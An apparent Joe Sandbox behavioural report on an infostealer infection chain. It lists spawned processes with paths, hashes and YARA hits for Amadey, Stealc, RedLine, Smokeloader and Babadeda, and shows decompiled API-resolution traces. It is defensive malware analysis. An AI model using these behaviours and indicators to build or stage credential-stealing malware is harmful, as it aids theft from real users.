Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000F.00000003.2298982313.00000000048F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000F.00000002.2339495217.0000000000661000.00000040.00000001.01000000.0000000F.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	14:10:00
Start date:	26/07/2024
Path:	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Imagebase:	0x660000
File size:	1'909'760 bytes
MD5 hash:	2AF5EB9FB318C9A454DE54914E121031
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000013.00000002.3273644345.0000000000661000.00000040.00000001.01000000.0000000F.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000013.00000003.2654668083.0000000004FF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	20
Start time:	14:10:00
Start date:	26/07/2024
Path:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Imagebase:	0xb20000
File size:	1'898'496 bytes
MD5 hash:	8EF54B7689AF3A0FE5028BC42964BB26
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000014.00000003.2655374647.00000000048A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000014.00000002.3280286776.0000000000B21000.00000040.00000001.01000000.0000000D.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	21
Start time:	14:10:05
Start date:	26/07/2024
Path:	C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe"
Imagebase:	0x400000
File size:	250'880 bytes
MD5 hash:	45FD30020C12378C242DC90687EDC24C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000015.00000002.2792244959.00000000026FD000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000015.00000002.2792599866.0000000002717000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000015.00000002.2794658661.0000000004080000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	14:10:07
Start date:	26/07/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7496 -s 1048
Imagebase:	0xf20000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	14:10:08
Start date:	26/07/2024
Path:	C:\Users\user\1000003002\ee7a49fbf0.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\1000003002\ee7a49fbf0.exe"
Imagebase:	0x400000
File size:	91'648 bytes
MD5 hash:	2DE90BE7036903B103DCAA9B3CF3E2E8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Babadeda, Description: Yara detected Babadeda, Source: C:\Users\user\1000003002\ee7a49fbf0.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	14:10:08
Start date:	26/07/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\2E3C.tmp\2E3D.tmp\2E3E.bat C:\Users\user\1000003002\ee7a49fbf0.exe"
Imagebase:	0x7ff704900000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	14:10:08
Start date:	26/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	14:10:08
Start date:	26/07/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.youtube.com/account"
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	28
Start time:	14:10:08
Start date:	26/07/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" "https://www.youtube.com/account"
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	14:10:08
Start date:	26/07/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account"
Imagebase:	0x7ff79f9e0000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	14:10:09
Start date:	26/07/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2316 --field-trial-handle=2252,i,8316535468258998242,13647816152217596395,262144 /prefetch:8
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	32
Start time:	14:10:09
Start date:	26/07/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account --attempting-deelevation
Imagebase:	0x7ff79f9e0000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	14:10:09
Start date:	26/07/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
Imagebase:	0x7ff79f9e0000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	34
Start time:	14:10:10
Start date:	26/07/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2136 --field-trial-handle=2104,i,9402509172041055831,1536830809750770573,262144 /prefetch:3
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	14:10:10
Start date:	26/07/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate https://www.youtube.com/account
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	36
Start time:	14:10:11
Start date:	26/07/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=3020 --field-trial-handle=2744,i,8170982657460856401,12893479799030225772,262144 /prefetch:3
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	40
Start time:	14:10:15
Start date:	26/07/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2268 -parentBuildID 20230927232528 -prefsHandle 2188 -prefMapHandle 2148 -prefsLen 25308 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e3d9a631-0c4f-4452-8e9e-490c2e469294} 6968 "\\.\pipe\gecko-crash-server-pipe.6968" 16dcc56d910 socket
Imagebase:	0x7ff79f9e0000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	42
Start time:	14:10:18
Start date:	26/07/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6772 --field-trial-handle=2744,i,8170982657460856401,12893479799030225772,262144 /prefetch:8
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	14:10:18
Start date:	26/07/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6916 --field-trial-handle=2744,i,8170982657460856401,12893479799030225772,262144 /prefetch:8
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	44
Start time:	14:10:19
Start date:	26/07/2024
Path:	C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe"
Imagebase:	0x400000
File size:	250'880 bytes
MD5 hash:	45FD30020C12378C242DC90687EDC24C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000002C.00000002.2900300016.00000000024CA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000002C.00000002.2899871505.00000000024B0000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000002C.00000002.2902291876.00000000025C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	14:10:20
Start date:	26/07/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4548 -parentBuildID 20230927232528 -prefsHandle 4540 -prefMapHandle 4536 -prefsLen 26338 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b3a73529-841c-43f4-a1e0-97d887784ff3} 6968 "\\.\pipe\gecko-crash-server-pipe.6968" 16ddf13f710 rdd
Imagebase:	0x7ff79f9e0000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	46
Start time:	14:10:21
Start date:	26/07/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-GB --service-sandbox-type=audio --mojo-platform-channel-handle=7960 --field-trial-handle=2744,i,8170982657460856401,12893479799030225772,262144 /prefetch:8
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	47
Start time:	14:10:22
Start date:	26/07/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=8128 --field-trial-handle=2744,i,8170982657460856401,12893479799030225772,262144 /prefetch:8
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	4.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4.5%
Total number of Nodes:	2000
Total number of Limit Nodes:	40

Executed Functions

Function 004195E0 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(75900000,02715B00), ref: 004195FD
GetProcAddress.KERNEL32(75900000,02715B20), ref: 00419615
GetProcAddress.KERNEL32(75900000,0271BD20), ref: 0041962E
GetProcAddress.KERNEL32(75900000,0271BD38), ref: 00419646
GetProcAddress.KERNEL32(75900000,0271BD08), ref: 0041965E
GetProcAddress.KERNEL32(75900000,0271BD68), ref: 00419677
GetProcAddress.KERNEL32(75900000,02719168), ref: 0041968F
GetProcAddress.KERNEL32(75900000,0271BCF0), ref: 004196A7
GetProcAddress.KERNEL32(75900000,0271BD80), ref: 004196C0
GetProcAddress.KERNEL32(75900000,0271BD98), ref: 004196D8
GetProcAddress.KERNEL32(75900000,0271BDB0), ref: 004196F0
GetProcAddress.KERNEL32(75900000,02715B60), ref: 00419709
GetProcAddress.KERNEL32(75900000,02715BA0), ref: 00419721
GetProcAddress.KERNEL32(75900000,02715D80), ref: 00419739
GetProcAddress.KERNEL32(75900000,02715BC0), ref: 00419752
GetProcAddress.KERNEL32(75900000,02739560), ref: 0041976A
GetProcAddress.KERNEL32(75900000,027394E8), ref: 00419782
GetProcAddress.KERNEL32(75900000,02718F38), ref: 0041979B
GetProcAddress.KERNEL32(75900000,02715BE0), ref: 004197B3
GetProcAddress.KERNEL32(75900000,02739530), ref: 004197CB
GetProcAddress.KERNEL32(75900000,02739650), ref: 004197E4
GetProcAddress.KERNEL32(75900000,02739668), ref: 004197FC
GetProcAddress.KERNEL32(75900000,02739440), ref: 00419814
GetProcAddress.KERNEL32(75900000,02715C60), ref: 0041982D
GetProcAddress.KERNEL32(75900000,027394D0), ref: 00419845
GetProcAddress.KERNEL32(75900000,027393C8), ref: 0041985D
GetProcAddress.KERNEL32(75900000,02739680), ref: 00419876
GetProcAddress.KERNEL32(75900000,02739458), ref: 0041988E
GetProcAddress.KERNEL32(75900000,02739488), ref: 004198A6
GetProcAddress.KERNEL32(75900000,027394B8), ref: 004198BF
GetProcAddress.KERNEL32(75900000,027393E0), ref: 004198D7
GetProcAddress.KERNEL32(75900000,027393F8), ref: 004198EF
GetProcAddress.KERNEL32(75900000,02739698), ref: 00419908
GetProcAddress.KERNEL32(75900000,02718BE0), ref: 00419920
GetProcAddress.KERNEL32(75900000,027395F0), ref: 00419938
GetProcAddress.KERNEL32(75900000,02739500), ref: 00419951
GetProcAddress.KERNEL32(75900000,02715CE0), ref: 00419969
GetProcAddress.KERNEL32(75900000,027393B0), ref: 00419981
GetProcAddress.KERNEL32(75900000,02715DA0), ref: 0041999A
GetProcAddress.KERNEL32(75900000,02739410), ref: 004199B2
GetProcAddress.KERNEL32(75900000,02739470), ref: 004199CA
GetProcAddress.KERNEL32(75900000,02715DC0), ref: 004199E3
GetProcAddress.KERNEL32(75900000,02716040), ref: 004199FB
LoadLibraryA.KERNEL32(027395A8,?,00415783,?,00000034,00000064,004160A0,?,0000002C,00000064,00416040,?,00000030,00000064,Function_000155B0,?), ref: 00419A0D
LoadLibraryA.KERNEL32(02739428,?,00415783,?,00000034,00000064,004160A0,?,0000002C,00000064,00416040,?,00000030,00000064,Function_000155B0,?), ref: 00419A1E
LoadLibraryA.KERNEL32(02739638,?,00415783,?,00000034,00000064,004160A0,?,0000002C,00000064,00416040,?,00000030,00000064,Function_000155B0,?), ref: 00419A30
LoadLibraryA.KERNEL32(02739608,?,00415783,?,00000034,00000064,004160A0,?,0000002C,00000064,00416040,?,00000030,00000064,Function_000155B0,?), ref: 00419A42
LoadLibraryA.KERNEL32(02739518,?,00415783,?,00000034,00000064,004160A0,?,0000002C,00000064,00416040,?,00000030,00000064,Function_000155B0,?), ref: 00419A53
LoadLibraryA.KERNEL32(02739548,?,00415783,?,00000034,00000064,004160A0,?,0000002C,00000064,00416040,?,00000030,00000064,Function_000155B0,?), ref: 00419A65
LoadLibraryA.KERNEL32(027395D8,?,00415783,?,00000034,00000064,004160A0,?,0000002C,00000064,00416040,?,00000030,00000064,Function_000155B0,?), ref: 00419A77
LoadLibraryA.KERNEL32(02739578,?,00415783,?,00000034,00000064,004160A0,?,0000002C,00000064,00416040,?,00000030,00000064,Function_000155B0,?), ref: 00419A88
GetProcAddress.KERNEL32(75FD0000,027161A0), ref: 00419AAA
GetProcAddress.KERNEL32(75FD0000,027394A0), ref: 00419AC2
GetProcAddress.KERNEL32(75FD0000,02736838), ref: 00419ADA
GetProcAddress.KERNEL32(75FD0000,02739590), ref: 00419AF3
GetProcAddress.KERNEL32(75FD0000,02716080), ref: 00419B0B
GetProcAddress.KERNEL32(734B0000,027190F0), ref: 00419B30
GetProcAddress.KERNEL32(734B0000,02715F40), ref: 00419B49
GetProcAddress.KERNEL32(734B0000,02718FB0), ref: 00419B61
GetProcAddress.KERNEL32(734B0000,027395C0), ref: 00419B79
GetProcAddress.KERNEL32(734B0000,02739620), ref: 00419B92
GetProcAddress.KERNEL32(734B0000,027160A0), ref: 00419BAA
GetProcAddress.KERNEL32(734B0000,02715F60), ref: 00419BC2
GetProcAddress.KERNEL32(734B0000,027396C8), ref: 00419BDB
GetProcAddress.KERNEL32(763B0000,027160C0), ref: 00419BFC
GetProcAddress.KERNEL32(763B0000,02715FC0), ref: 00419C14
GetProcAddress.KERNEL32(763B0000,02739758), ref: 00419C2D
GetProcAddress.KERNEL32(763B0000,02739770), ref: 00419C45
GetProcAddress.KERNEL32(763B0000,02716060), ref: 00419C5D
GetProcAddress.KERNEL32(750F0000,02718E70), ref: 00419C83
GetProcAddress.KERNEL32(750F0000,02719320), ref: 00419C9B
GetProcAddress.KERNEL32(750F0000,027396B0), ref: 00419CB3
GetProcAddress.KERNEL32(750F0000,02715EA0), ref: 00419CCC
GetProcAddress.KERNEL32(750F0000,027161C0), ref: 00419CE4
GetProcAddress.KERNEL32(750F0000,02718EE8), ref: 00419CFC
GetProcAddress.KERNEL32(75A50000,02739728), ref: 00419D22
GetProcAddress.KERNEL32(75A50000,02715F80), ref: 00419D3A
GetProcAddress.KERNEL32(75A50000,027367D8), ref: 00419D52
GetProcAddress.KERNEL32(75A50000,02739710), ref: 00419D6B
GetProcAddress.KERNEL32(75A50000,027396E0), ref: 00419D83
GetProcAddress.KERNEL32(75A50000,027160E0), ref: 00419D9B
GetProcAddress.KERNEL32(75A50000,02716100), ref: 00419DB4
GetProcAddress.KERNEL32(75A50000,027396F8), ref: 00419DCC
GetProcAddress.KERNEL32(75A50000,02739740), ref: 00419DE4
GetProcAddress.KERNEL32(75070000,02715FA0), ref: 00419E06
GetProcAddress.KERNEL32(75070000,02739CC8), ref: 00419E1E
GetProcAddress.KERNEL32(75070000,02739B78), ref: 00419E36
GetProcAddress.KERNEL32(75070000,02739C98), ref: 00419E4F
GetProcAddress.KERNEL32(75070000,02739AE8), ref: 00419E67
GetProcAddress.KERNEL32(74E50000,02716200), ref: 00419E88
GetProcAddress.KERNEL32(74E50000,02716120), ref: 00419EA1
GetProcAddress.KERNEL32(75320000,02715F00), ref: 00419EC2
GetProcAddress.KERNEL32(75320000,02739D40), ref: 00419EDA
GetProcAddress.KERNEL32(6F080000,02715FE0), ref: 00419F00
GetProcAddress.KERNEL32(6F080000,02715E80), ref: 00419F18
GetProcAddress.KERNEL32(6F080000,02716140), ref: 00419F30
GetProcAddress.KERNEL32(6F080000,02739B48), ref: 00419F49
GetProcAddress.KERNEL32(6F080000,02716160), ref: 00419F61
GetProcAddress.KERNEL32(6F080000,02716180), ref: 00419F79
GetProcAddress.KERNEL32(6F080000,02716000), ref: 00419F92
GetProcAddress.KERNEL32(6F080000,02715F20), ref: 00419FAA
GetProcAddress.KERNEL32(6F080000,InternetSetOptionA), ref: 00419FC1
GetProcAddress.KERNEL32(6F080000,HttpQueryInfoA), ref: 00419FD7
GetProcAddress.KERNEL32(74E00000,02739C38), ref: 00419FF9
GetProcAddress.KERNEL32(74E00000,027368E8), ref: 0041A011
GetProcAddress.KERNEL32(74E00000,02739D58), ref: 0041A029
GetProcAddress.KERNEL32(74E00000,02739B60), ref: 0041A042
GetProcAddress.KERNEL32(74DF0000,027161E0), ref: 0041A063
GetProcAddress.KERNEL32(6E370000,02739BD8), ref: 0041A084
GetProcAddress.KERNEL32(6E370000,02715EE0), ref: 0041A09D
GetProcAddress.KERNEL32(6E370000,02739D70), ref: 0041A0B5
GetProcAddress.KERNEL32(6E370000,02739B90), ref: 0041A0CD

Strings

InternetSetOptionA, xrefs: 00419FB5
HttpQueryInfoA, xrefs: 00419FCC

Memory Dump Source

Source File: 00000000.00000002.2442165197.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2442165197.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: HttpQueryInfoA$InternetSetOptionA
API String ID: 2238633743-1775429166
Opcode ID: 42a1c126b23ada8373e6c48d5b9de957363c63bf0e0344acec6b940ad07a1c70
Instruction ID: de404ee9f47513f53d28e8016dc56f999ad60f1515a6c9981bc8237813ea7153
Opcode Fuzzy Hash: 42a1c126b23ada8373e6c48d5b9de957363c63bf0e0344acec6b940ad07a1c70
Instruction Fuzzy Hash: 946243B5500E00AFC774DFA8EE88D1E3BABBB8C761750A51AE609C3674D7349443DBA4

Function 00404610 Relevance: 112.1, APIs: 34, Strings: 30, Instructions: 114
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 0040461C
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 00404627
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 00404632
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 0040463D
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 00404648
GetProcessHeap.KERNEL32(00000000,?,?,0000000F,?,0041649B), ref: 00404657
RtlAllocateHeap.NTDLL(00000000,?,0000000F,?,0041649B), ref: 0040465E
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 0040466C
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 00404677
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 00404682
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 0040468D
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 00404698
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 004046AC
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 004046B7
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 004046C2
